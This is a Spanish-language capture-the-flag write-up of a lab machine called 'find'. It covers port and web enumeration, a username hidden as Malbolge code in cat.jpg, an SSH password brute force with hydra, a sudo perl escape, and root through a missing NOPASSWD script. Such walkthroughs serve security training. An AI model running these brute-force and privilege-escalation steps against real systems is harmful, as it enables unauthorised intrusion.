Comenzamos con la enumeración de puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.11
❯ nmap -sCV -p22,80 -oN 02-targeted.txt 192.168.1.11
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-21 23:48 -03
Nmap scan report for 192.168.1.11
Host is up (0.00034s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6e:f7:90:04:84:0d:cd:1e:5d:2e:da:b1:51:d9:bf:57 (RSA)
| 256 39:5a:66:38:f7:64:9a:94:dd:bc:b6:fb:f8:e7:3f:87 (ECDSA)
|_ 256 8c:26:e7:26:62:77:16:40:fb:b5:cf:a6:1c:e0:f6:9d (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.63 secondsEnumeramos con gobuster (incluyendo imágenes) y encontramos un cat.jpg:
❯ gobuster dir -u 'http://192.168.1.11' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x html,php,txt -r
...
/index.html (Status: 200) [Size: 10701]
/manual (Status: 200) [Size: 626]
/robots.txt (Status: 200) [Size: 13]
...
❯ gobuster dir -u 'http://192.168.1.11' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x jpg,gif,png -r
...
/cat.jpg (Status: 200) [Size: 35137]
...Al aplicar strings a la imagen, encontramos un fragmento de código en Malbolge (un lenguaje esotérico):
❯ strings cat.jpg
...
>C<;_"!~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONMLKJ`_dcba`_^]\Uy<XW
VOsrRKPONGk.-,+*)('&%$#"!~}|{zyxwvutsrqponmlkjihgfedcba`_^]\[ZYXWVUTSRQPONML
KJIHGFEDZY^W\[ZYXWPOsSRQPON0Fj-IHAeR
...Al decodificarlo obtenemos un usuario potencial:
missyredHacemos fuerza bruta contra SSH con hydra:
❯ hydra -l missyred -P ~/Documentos/wordlists/rockyou.txt 192.168.1.11 ssh -t 64
...
[22][ssh] host: 192.168.1.11 login: missyred password: iloveyou
...Iniciamos sesión y revisamos sudo -l:
missyred@find:~$ sudo -l
[sudo] password for missyred:
Matching Defaults entries for missyred on find:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User missyred may run the following commands on find:
(kings) /usr/bin/perlPodemos ejecutar perl como kings, lo que aprovechamos para obtener su shell y la primera flag:
missyred@find:~$ sudo -u kings perl -e 'exec "/bin/bash";'
kings@find:/home/missyred$Continuamos con sudo -l como kings:
kings@find:~$ sudo -l
Matching Defaults entries for kings on find:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User kings may run the following commands on find:
(ALL) NOPASSWD: /opt/boom/boom.shEl script referenciado no existe:
kings@find:~$ cat /opt/boom/boom.sh
cat: /opt/boom/boom.sh: No such file or directoryComo podemos crearlo, lo escribimos para que lance una shell y lo ejecutamos como root:
kings@find:/opt/boom$ cat boom.sh
/bin/bash
kings@find:/opt/boom$ sudo ./boom.sh
root@find:/opt/boom#Obtenemos nuestra shell de root y la segunda flag.
Fin.